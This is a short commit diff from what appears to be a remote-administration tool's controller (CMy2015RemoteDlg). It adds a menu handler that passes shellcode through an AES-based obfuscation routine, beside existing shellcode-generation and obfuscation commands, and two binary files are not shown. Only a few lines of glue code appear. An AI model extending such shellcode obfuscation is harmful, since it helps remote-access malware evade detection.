Improve: Add debug code for SCLoader

This commit is contained in:
yuanyuanxiang
2025-11-20 05:23:28 +08:00
parent bd5f5f0547
commit a5f068b036
5 changed files with 28 additions and 4 deletions

Binary file not shown.

View File

@@ -533,6 +533,7 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx)
ON_COMMAND(ID_SHELLCODE_AES_BIN, &CMy2015RemoteDlg::OnShellcodeAesBin)
ON_COMMAND(ID_SHELLCODE_TEST_AES_BIN, &CMy2015RemoteDlg::OnShellcodeTestAesBin)
ON_COMMAND(ID_TOOL_RELOAD_PLUGINS, &CMy2015RemoteDlg::OnToolReloadPlugins)
ON_COMMAND(ID_SHELLCODE_AES_C_ARRAY, &CMy2015RemoteDlg::OnShellcodeAesCArray)
END_MESSAGE_MAP()
@@ -3336,6 +3337,12 @@ void CMy2015RemoteDlg::OnObfsShellcode()
shellcode_process(&obfs);
}
void CMy2015RemoteDlg::OnShellcodeAesCArray()
{
ObfsAes obfs;
shellcode_process(&obfs);
}
void CMy2015RemoteDlg::OnToolGenShellcodeBin()
{

View File

@@ -356,4 +356,5 @@ public:
afx_msg void OnShellcodeAesBin();
afx_msg void OnShellcodeTestAesBin();
afx_msg void OnToolReloadPlugins();
afx_msg void OnShellcodeAesCArray();
};

Binary file not shown.